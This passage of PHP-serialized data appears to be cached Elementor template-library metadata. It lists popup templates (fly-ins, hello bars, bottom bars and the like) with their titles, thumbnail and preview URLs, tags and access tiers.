bar\";s:4:\"tags\";s:31:\"[\"Contact\",\"Health\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:29;a:21:{s:4:\"tmpl\";i:1312;s:2:\"id\";i:22663;s:5:\"title\";s:36:\"Classic | Subscription | Sports Blog\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/03/45-sport-blog-Subscription.jpg\";s:12:\"tmpl_created\";i:1647509908;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-subscription-sports-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:16:\"[\"Blog\",\"Sport\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:30;a:21:{s:4:\"tmpl\";i:1313;s:2:\"id\";i:22673;s:5:\"title\";s:30:\"Hello Bar | Booking | Event DJ\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/DJ-service-46-small.jpg\";s:12:\"tmpl_created\";i:1647510160;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/hello-bar-booking-event-dj/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:31:\"[\"Booking\",\"Events\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:31;a:21:{s:4:\"tmpl\";i:1314;s:2:\"id\";i:22684;s:5:\"title\";s:36:\"Fly-In | Discount | Cleaning Company\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/51-cleaning-company-Discount.jpg\";s:12:\"tmpl_created\";i:1647510546;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-discount-cleaning-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:31:\"[\"Discount\",\"Offer\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:32;a:21:{s:4:\"tmpl\";i:1315;s:2:\"id\";i:22693;s:5:\"title\";s:28:\"Fly-In | Contact | Carpenter\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/carpenter-53-small.jpg\";s:12:\"tmpl_created\";i:1647511972;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/fly-in-contact-carpenter/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:22:\"[\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:33;a:21:{s:4:\"tmpl\";i:1316;s:2:\"id\";i:22703;s:5:\"title\";s:31:\"Classic | Booking | Yoga Studio\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/55-yoga-studio-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647512209;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-booking-yoga-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:30:\"[\"Booking\",\"Contact\",\"Health\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:34;a:21:{s:4:\"tmpl\";i:1317;s:2:\"id\";i:22714;s:5:\"title\";s:37:\"Classic | Discount | Pet Care Company\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/56-Pet-Care-Discount.jpg\";s:12:\"tmpl_created\";i:1647513031;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/classic-discount-pet-care-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:17:\"[\"Offer\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:35;a:21:{s:4:\"tmpl\";i:1318;s:2:\"id\";i:22725;s:5:\"title\";s:38:\"Fly-In | Discount | Online Coffee Shop\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/online-coffee-shop-57-small.jpg\";s:12:\"tmpl_created\";i:1647513325;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/fly-in-discount-online-coffee-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:29:\"[\"Food\",\"Offer\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:36;a:21:{s:4:\"tmpl\";i:1319;s:2:\"id\";i:22737;s:5:\"title\";s:44:\"Fly-In | CTA | Moving &#038; Storage Company\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/moving-company-59-small.jpg\";s:12:\"tmpl_created\";i:1647520956;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/fly-in-cta-moving-storage-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:37;a:21:{s:4:\"tmpl\";i:1320;s:2:\"id\";i:22749;s:5:\"title\";s:47:\"Classic | Contact | Industrial Design Portfolio\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/60-industrial-design-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647528116;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/classic-contact-industrial-design-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:40:\"[\"Contact\",\"Interior Design\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:38;a:21:{s:4:\"tmpl\";i:1321;s:2:\"id\";i:22759;s:5:\"title\";s:25:\"Classic | Contact | Drone\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/drone-61-small.jpg\";s:12:\"tmpl_created\";i:1647528899;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/classic-contact-drone/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:22:\"[\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:39;a:21:{s:4:\"tmpl\";i:1322;s:2:\"id\";i:22768;s:5:\"title\";s:46:\"Full Screen | Menu | Fashion Stylist Portfolio\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/62-Fashion-Stylist-Menu.jpg\";s:12:\"tmpl_created\";i:1647529434;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/full-screen-menu-fashion-stylist-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:31:\"[\"Fashion\",\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:40;a:21:{s:4:\"tmpl\";i:1323;s:2:\"id\";i:22780;s:5:\"title\";s:31:\"Fly-In | CTA | Landscape Design\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/64-Landscape-Design-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647530337;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-cta-landscape-design/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:18:\"[\"cta\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:41;a:21:{s:4:\"tmpl\";i:1324;s:2:\"id\";i:22790;s:5:\"title\";s:48:\"Bottom Bar  | Contact | Architecture Photography\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/architecture-photography-65-small.jpg\";s:12:\"tmpl_created\";i:1647532358;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/bottom-bar-contact-architecture-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:17:\"essential-oct2023\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:26:\"[\"Architecture\",\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:42;a:21:{s:4:\"tmpl\";i:1325;s:2:\"id\";i:22800;s:5:\"title\";s:41:\"Fly-In  | CTA | Speech-Language Therapist\";s:9:\"thumbnail\";s:103:\"https://library.elementor.com/wp-content/uploads/2022/03/66-Speech-Language-Therapist-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647532720;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/fly-in-cta-speech-language-therapist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:25:\"[\"cta\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:43;a:21:{s:4:\"tmpl\";i:1326;s:2:\"id\";i:22812;s:5:\"title\";s:35:\"Full Screen | Verification | Winery\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/67-Winery-Verification.jpg\";s:12:\"tmpl_created\";i:1647761384;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/full-screen-verification-winery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:24:\"[\"Alert\",\"Verification\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:44;a:21:{s:4:\"tmpl\";i:1327;s:2:\"id\";i:22822;s:5:\"title\";s:36:\"Fly-In | Subscription | Nutritionist\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/nutritionist-69-small.jpg\";s:12:\"tmpl_created\";i:1647762620;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-subscription-nutritionist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:28:\"[\"Food\",\"Health\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:45;a:21:{s:4:\"tmpl\";i:1328;s:2:\"id\";i:22833;s:5:\"title\";s:40:\"Classic | Subscription | App &#038; SaaS\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/03/app-70-small.jpg\";s:12:\"tmpl_created\";i:1647762955;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-subscription-app-saas/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:14:\"[\"App\",\"SaaS\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:46;a:21:{s:4:\"tmpl\";i:1329;s:2:\"id\";i:22844;s:5:\"title\";s:41:\"Bottom Bar | Discount | Handmade Cupcakes\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/72-Handmade-Cupcakes-Discount.jpg\";s:12:\"tmpl_created\";i:1647763350;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/bottom-bar-discount-handmade-cupcakes/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:21:\"[\"Food\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:47;a:21:{s:4:\"tmpl\";i:1330;s:2:\"id\";i:22855;s:5:\"title\";s:40:\"Bottom Bar | Subscription | Fashion Blog\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/fashion-blog-75-small.jpg\";s:12:\"tmpl_created\";i:1647763907;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/bottom-bar-subscription-fashion-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:30:\"[\"Blog\",\"Fashion\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:48;a:21:{s:4:\"tmpl\";i:1331;s:2:\"id\";i:22866;s:5:\"title\";s:28:\"Fly-In | CTA | Private Tutor\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/private-tutor-77-small.jpg\";s:12:\"tmpl_created\";i:1647764062;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/fly-in-cta-private-tutor/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:49;a:21:{s:4:\"tmpl\";i:1332;s:2:\"id\";i:22876;s:5:\"title\";s:30:\"Classic | CTA | Tennis Academy\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/78-Tennis-Academy-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647765192;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-tennis-academy/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:50;a:21:{s:4:\"tmpl\";i:1333;s:2:\"id\";i:22887;s:5:\"title\";s:31:\"Fly-In | CTA | Shared Workspace\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/shared-workspace-79-small.jpg\";s:12:\"tmpl_created\";i:1647765419;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-cta-shared-workspace/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:18:\"[\"Business\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:51;a:21:{s:4:\"tmpl\";i:1334;s:2:\"id\";i:22899;s:5:\"title\";s:30:\"Bottom Bar | CTA | Art Gallery\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/80-Art-Gallery-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647765652;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/bottom-bar-cta-art-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:13:\"[\"Art\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:52;a:21:{s:4:\"tmpl\";i:1335;s:2:\"id\";i:22910;s:5:\"title\";s:44:\"Fly-In | Subscription | Hiking Tours Company\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/hiking-tours-company-81-small.jpg\";s:12:\"tmpl_created\";i:1647765835;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/fly-in-subscription-hiking-tours-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:29:\"[\"Subscribe\",\"Travel\",\"Trip\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:53;a:21:{s:4:\"tmpl\";i:1336;s:2:\"id\";i:22921;s:5:\"title\";s:26:\"Classic | CTA | Music Band\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/music-band-82-small.jpg\";s:12:\"tmpl_created\";i:1647769462;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/popups/classic-cta-music-band/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:21:\"[\"Marketing\",\"Music\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:54;a:21:{s:4:\"tmpl\";i:1337;s:2:\"id\";i:22935;s:5:\"title\";s:35:\"Classic | CTA | Computer Technician\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/comuter-technician-83-small.jpg\";s:12:\"tmpl_created\";i:1647769843;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/classic-cta-computer-technician/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:18:\"[\"cta\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:55;a:21:{s:4:\"tmpl\";i:1338;s:2:\"id\";i:22945;s:5:\"title\";s:37:\"Classic | Discount | Delivery 